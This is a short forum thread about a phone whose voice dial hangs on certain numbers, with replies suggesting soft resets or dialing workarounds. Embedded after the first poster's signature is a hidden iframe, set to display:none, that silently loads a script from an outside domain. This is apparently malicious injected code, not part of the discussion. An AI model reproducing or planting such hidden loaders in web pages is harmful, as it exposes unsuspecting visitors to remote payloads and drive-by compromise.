+ Reply to Thread

Voice Dial strangeness

Sometimes certain numbers get hung up when I voice dial. It will recognize the command, say it's calling, then nothing... it reads calling but there is no ringing. And I cannot just push the call end button. They only to end the call is to shut the phone down, then start it up again. Now this same number can be dialed manually, from the address book and with speed dial fine. This only happens on voice dial...

Anyone have a clue?

Thanks in advance..

Tracey<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I had the same thing happen--a soft reset cured it.

Originally posted by 86thestartac
    I had the same thing happen--a soft reset cured it.
    Not for me... I have to do soft resets at least 3 or 4 times a day, it still gets hung up.

T

lou
    OCpDa
    I had a similar experience with my 6035. My sister's number in Arizona was always causing lockups. I would have to do a reset everytime I tried to call her. I even had problems when I dialed her from the address book. I ended up keeping her number in a note attached to her address book listing and dialing by highlighting the number. This problem went away when I got the 7135 but it seems that for whatever reason there may be numbers the phone simply doesn't like